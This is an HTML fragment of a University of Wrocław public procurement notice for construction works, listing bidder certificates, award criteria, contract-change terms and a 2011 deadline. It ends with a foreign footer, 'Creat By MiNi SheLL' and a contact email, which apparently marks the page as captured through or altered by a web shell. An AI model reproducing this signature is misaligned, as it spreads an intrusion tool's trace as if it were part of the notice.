<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz Ofertowy - załącznik nr 1 do SIWZ;
2)	Pełnomocnictwo dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych - w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza;
3)	W przypadku złożenia oferty wspólnej przez kilku Wykonawców, należy przedstawić pełnomocnictwo, w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza, ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców składających ofertę wspólną (Partnerów). Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Partnerów;
4)	Dowód wniesienia wadium;
5)	Pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów, na okres korzystania z nich przy wykonaniu zamówienia, jeżeli wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków - w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.6</li>
<li>2 - Termin wykonania - 0.4</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa § 8 Zmiany umowy
1.	Zgodnie z  art. 144 ust.1 Ustawy Pzp Zamawiający przewiduje następujące warunki  zmiany umowy w stosunku do treści oferty skutkujące możliwością zmiany wysokości wynagrodzenia lub zmiany terminu wykonania robót, gdy:
1.1.	Wykonawca w trakcie realizacji Robót ustali błędy lub braki w dokumentacji projektowej, które uniemożliwią  wykonanie przedmiotu umowy w ustalonych w niniejszej umowie terminie i/lub koszcie;
1.2.	Rozwiązania materiałowe przyjęte w Projekcie wykonawczym będą niemożliwe do zrealizowania;
1.3.	Wystąpienie siły wyższej.
2.	Ilekroć zajdzie konieczność wprowadzenia zmian, o których mowa w ust.1 Wykonawca przygotuje kosztorys zamienny dla tych robót metodą kalkulacji szczegółowej opisaną        w (nieobowiązujących) postanowieniach rozporządzenia Ministra Rozwoju Regionalnego        i Budownictwa z dnia 13 lipca 2001 r. w sprawie metod kosztorysowania obiektów i robót budowlanych (Dz.U. 2001 Nr 80,poz. 867), a przyjętych do stosowania zgodnie z art. 384   § 2 KC w oparciu o składniki cenotwórcze przyjęte na poziomie stawek z baz SEKOCENBUD z poprzedniego kwartału.
3.	Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody.
4.	Procedura wprowadzania zmian: 
Każda zmiana umowy w stosunku do oferty złożonej przez Wykonawcę, w szczególności mająca wpływ na:
a) zwiększenie wynagrodzenia umownego Wykonawcy,
b) przedłużenie czasu na wykonanie Robót stanowiących przedmiot umowy,
musi być dokonana pod rygorem nieważności w formie pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bzp.uni.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych Uniwersytetu Wrocławskiego, ul. Kuźnicza 49/55, 50-138 Wrocław, I piętro, pokój 100.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.11.2011 godzina 10:00, miejsce: Biuro Zamówień Publicznych Uniwersytetu Wrocławskiego, ul. Kuźnicza 49/55, 50-138 Wrocław, I piętro, pokój 100.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Wykonawca dostarczy Zamawiającemu (zgodnie z § 9 wzoru umowy), najpóźniej w dniu podpisania umowy, polisę lub polisy ubezpieczenia na łączną kwotę 120% wynagrodzenia ofertowego brutto Wykonawcy, na okres od daty rozpoczęcia robót do podpisania protokołu odbioru lub protokołu usunięcia usterek, dla następujących wypadków, które są spowodowane zagrożeniami stanowiącymi  ryzyko Wykonawcy:
- szkody w robotach, urządzeniach i materiałach.
- szkody w sprzęcie.
- szkody w mieniu stanowiącym własność Zamawiającego (oprócz robót, urządzeń, materiałów  
  i sprzętu) powstałe w związku z wykonywaniem Umowy. 
- nieszczęśliwe wypadki.
- szkody osób trzecich. 
2.Bieg terminu gwarancji rozpocznie się od daty bezusterkowego odbioru przedmiotu Umowy, a zakończy się z chwilą upływu 36 miesięcy liczonych od daty uzyskania przez Zamawiającego decyzji o pozwoleniu na użytkowanie Obiektu.
Warunki gwarancji określone będą w Karcie Gwarancyjnej i odpowiadać będą warunkom określonym w załączniku nr 5 do Umowy.
3. Okres rękojmi rozpocznie się od daty bezusterkowego odbioru przedmiotu Umowy, a zakończy się z chwilą upływu 42 miesięcy liczonych od daty uzyskania przez Zamawiającego decyzji o pozwoleniu na użytkowanie Obiektu.
4.Zamawiający nie przewiduje zawarcia umowy ramowej.
5.Zamawiający nie przewiduje zastosowania dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com